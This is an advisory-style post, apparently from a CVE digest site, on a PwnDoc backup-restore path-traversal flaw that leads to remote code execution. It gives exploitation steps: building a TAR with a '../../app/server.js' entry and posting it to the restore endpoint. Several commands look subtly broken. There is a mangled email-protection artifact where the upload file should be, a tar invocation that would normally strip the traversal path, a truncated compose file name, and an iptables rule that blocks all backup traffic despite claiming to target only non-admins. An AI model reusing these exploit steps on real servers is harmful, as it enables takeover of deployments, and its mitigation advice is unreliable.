How CVE-2025-27410 Works
PwnDoc’s backup restore feature fails to sanitize TAR entry names during extraction, enabling path traversal. An attacker with `backups:create` and `backups:update` permissions (admin by default) can craft a malicious TAR archive containing entries like ../../app/server.js. When restored, these entries overwrite system files outside the restore directory. By targeting a `.js` file loaded at runtime, restarting the container executes the attacker’s code with admin privileges. Version 1.2.0 patches this by validating TAR entry paths before extraction.
DailyCVE Form
Platform: PwnDoc
Version: <1.2.0
Vulnerability: Path Traversal→RCE
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation
1. Craft Malicious TAR:
mkdir -p ../../app/ && echo "malicious_code" > ../../app/server.js
tar -cvf exploit.tar ../../app/server.js
2. Upload & Trigger:
POST /api/backups/restore HTTP/1.1
Content-Type: multipart/form-data

[email protected]
Detection
Check for vulnerable versions:
curl -s http://target/api/version | grep -q "1.[0-1]."
Mitigation
1. Patch: Upgrade to v1.2.0+.
2. Restrict Permissions:
docker-com.yml:
  environment:
    - PWN_DEFAULT_ROLE=user
3. File Integrity Monitoring:
Monitor critical .js files:
auditctl -w /app/server.js -p wa -k pwn_doc_rce
4. Network Controls:
Block backup API for non-admins:
iptables -A INPUT -p tcp --dport 8080 -m string --string "/api/backups" --algo bm -j DROP
References
Sources:
Reported By: nvd.nist.gov